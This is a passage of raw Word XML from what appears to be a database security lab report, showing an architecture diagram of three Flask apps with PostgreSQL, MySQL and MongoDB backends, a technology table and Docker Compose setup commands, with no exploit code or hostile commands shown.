      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  Flask       </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>│  │</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  Flask         │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31435AEB" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F6F7"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>│  Port</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> 5001      </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>│  │</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  Port 5002   </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>│  │</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  Port 5003     │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0003C397" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F6F7"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  └──────────┬──────┘  └───────┬──────┘  └───┬────────────┘</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B731FA5" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F6F7"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">             │                 │              │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A91C1B9" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F6F7"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  ┌──────────▼──────┐  ┌───────▼──────┐  ┌───▼────────────┐</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44C1DA7E" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F6F7"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>│  vuln</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">1-db       </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>│  │</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  vuln2-db    </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>│  │</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  vuln3-db      │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BE7F4CE" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F6F7"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>│  PostgreSQL</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>12  │</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>│  MySQL</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> 8.0   </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>│  │</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  MongoDB 6.0   │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CA7654A" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F6F7"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  └─────────────────┘  └──────────────┘  └────────────────┘</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CE5BBA5" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F6F7"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            │                  │                 │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="445C9B35" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F6F7"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            └──────────────────┴─────────────────┘</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FBB1A3E" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F6F7"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                      lab-network (bridge)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37EA9C22" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00E13696"/>
    <w:p w14:paraId="3E749580" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>2.2 Technologies &amp; Versions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480"/>
        <w:gridCol w:w="2480"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E13696" w14:paraId="7B761338"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9981E7A" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>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BD5F307" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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9D94309" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Role</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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EED94E5" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Port</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E13696" w14:paraId="5C48C40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CC3943" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Flask (Python)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BDAB29" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>3.x</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5C2C6B" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Web application framework</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20ED9E" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>5001 / 5002 / 5003</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E13696" w14:paraId="3E4CDE2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E961816" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>PostgreSQL</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F26FD61" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>12.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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5D32F9A" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Vuln 1 database</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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71D61E14" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>5432 (internal)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E13696" w14:paraId="421BBFA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F24B04" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>MySQL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34A6AD" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>8.0</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EB2CF8" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Vuln 2 database</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28CBB6" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>3306 (internal)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E13696" w14:paraId="11720AE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D93A4BC" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>MongoDB</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42395F0" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>6.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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43C09A1" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Vuln 3 database</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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E4A3F7A" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>27017 (internal)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E13696" w14:paraId="7154F7C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1A1D9B" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Docker / Compose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EEB8A6" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Latest</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2E7D03" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Container orchestration</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7ECB95" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>N/A</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E13696" w14:paraId="6FAFB98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3B1A524" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Python (exploit scripts)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1194400" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>3.11+</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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1527963" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Attack tooling</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2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4078615" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>N/A</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="436D7172" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00E13696"/>
    <w:p w14:paraId="58A5F090" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>2.3 Setup &amp; Startup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="710AAF75" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>The entire environment is started with a single command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41FA11F7" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F6F7"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>git clone https://github.com/mennatallahkhalifa/db-security-lab.git</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31901150" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F6F7"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">cd </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>db</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-security-lab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EF50911" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F6F7"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>docker compose up --build</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1969DDAB" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t xml:space="preserve">All six containers start automatically. The Flask apps use restart: </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>on-failure</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t xml:space="preserve"> to handle database readiness timing. Once all containers show status Up, the lab is ready.</w:t>
